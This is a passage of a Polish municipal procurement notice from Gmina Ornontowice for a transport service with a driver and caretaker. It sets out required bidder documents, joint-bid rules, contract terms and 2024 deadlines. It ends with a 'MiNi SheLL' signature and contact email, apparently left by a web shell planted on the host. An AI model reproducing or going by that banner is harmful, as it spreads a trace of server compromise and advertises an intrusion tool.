takim przypadku oświadczenie potwierdza brak podstaw wykluczenia Wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>b) podmiot udostępniający zasoby, na którego potencjał powołuje się Wykonawca celem potwierdzenia spełnienia warunków udziału w postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim podmiot udostępnia swoje zasoby Wykonawcy.<br/>4) Do oferty Wykonawca zobowiązany jest dołączyć:<br/>a) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru potwierdzającego, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania,<br/>b) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, gdy umocowanie osoby składającej ofertę nie wynika z dokumentów opisanych w rozdziale V ust. 1 pkt 4 lit a),<br/>c) zobowiązanie, o którym mowa w rozdziale I, ust. 5 pkt 3 oraz ust. 5 pkt 4 SWZ w przypadku polegania na zasobach podmiotu udostępniającego zasób Wykonawcy,<br/>d) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>e) pełnomocnictwo, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, z treści którego będzie wynikało umocowanie do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno zawierać w szczególności wskazanie:<br/>- postępowania zamówienia publicznego, którego dotyczy,<br/>- wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>- ustanowionego pełnomocnika oraz zakresu jego pełnomocnictwa,<br/>f) oświadczenie, o którym mowa w rozdziale I ust. 4 pkt 4 SWZ (Zamawiający dopuszcza złożenie tego oświadczenia na formularzu ofertowym); <br/>5) Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w rozdziale V ust. 1 pkt 4 lit a), jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>6) Zapisy rozdziału V ust. 1 pkt 4 lit b) stosuje się odpowiednio do osoby działającej w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>7) Zapisy rozdziału V ust. 1 pkt 4 lit a i lit b, ust. 1 pkt 5 stosuje się odpowiednio do osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">OŚWIADCZENIA I DOKUMENTY SKŁADANE NA WEZWANIE<br/>1) Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/> a) licencję na wykonywanie zawodu przewoźnika drogowego zgodnie z wymaganiami ustawy<br/>z dnia 6 września 2001r. o transporcie drogowym (Dz. U. z 2021r. poz. 919);<br/> b) wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (według załącznika nr 6 do SWZ),<br/> c) dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego wraz z dowodem opłacenia składki,<br/> d) wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami (według załącznika nr 7 do SWZ),<br/> e) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (osoba opiekuna i osoba kierowcy według załącznika nr 3 do SWZ).</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego<br/>1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W takim przypadku Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego (nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki cywilnej). Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>2) Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej (o ile został sformułowany), o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp, zostanie spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługę, do której realizacji te uprawnienia są wymagane.<br/>3) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia (o ile zostały sformułowane) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługę, do realizacji której te zdolności są wymagane.<br/>4) W przypadku, o którym mowa w ust. 4 pkt 2 i ust. 4 pkt 3, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do złożonej oferty w przypadku wystąpienia okoliczności wymienionych w art. 455 ust. 1 pkt 2 do 4 ustawy oraz art. 455 ust. 2 ustawy albo okoliczności przewidzianych zgodnie z art. 455 ust. 1 pkt 1 ustawy i w § 10 umowy.<br/>Szczegóły opisano w Załączniku nr 5 do SWZ - Projektowane postanowienia umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-29 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">System E-ZP Gminy Ornontowice</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-29 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-06-27</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Przed podpisaniem umowy Wykonawca przedłoży Zamawiającemu:<br/>a) dokument pełnomocnictwa dla osoby zawierającej umowę w imieniu Wykonawcy, o ile upoważnienie do reprezentowania Wykonawcy nie wynika z dokumentów rejestrowych Wykonawcy, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, lub dokument pełnomocnictwa nie został wcześniej złożony w trakcie postępowania o udzielenie zamówienia,<br/>b) kserokopie uprawnień osób skierowanych do realizacji zamówienia,<br/>c) kserokopie dowodu rejestracyjnego pojazdu wraz z obowiązkowym ubezpieczeniem komunikacyjnego OC i NNW dla pojazdów wykonujących zakres umowy,<br/>d) oświadczenie, że zrealizował wobec kierowców oraz opiekunów skierowanych do realizacji przedmiotu umowy obowiązek wynikający z art. 21 ustawy z dnia 13 maja 2016 r. o przeciwdziałaniu zagrożeniom przestępczością na tle seksualnym i ochronie nieletnich.<br/>Do 14 dni od dnia zawarcia umowy przedstawi Zamawiającemu zaświadczenia potwierdzające złożone oświadczenia o których mowa w ust. 4 lit. d),<br/>e) złożenia innych oświadczeń lub dokumentów, które wynikają z projektowanych postanowień umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com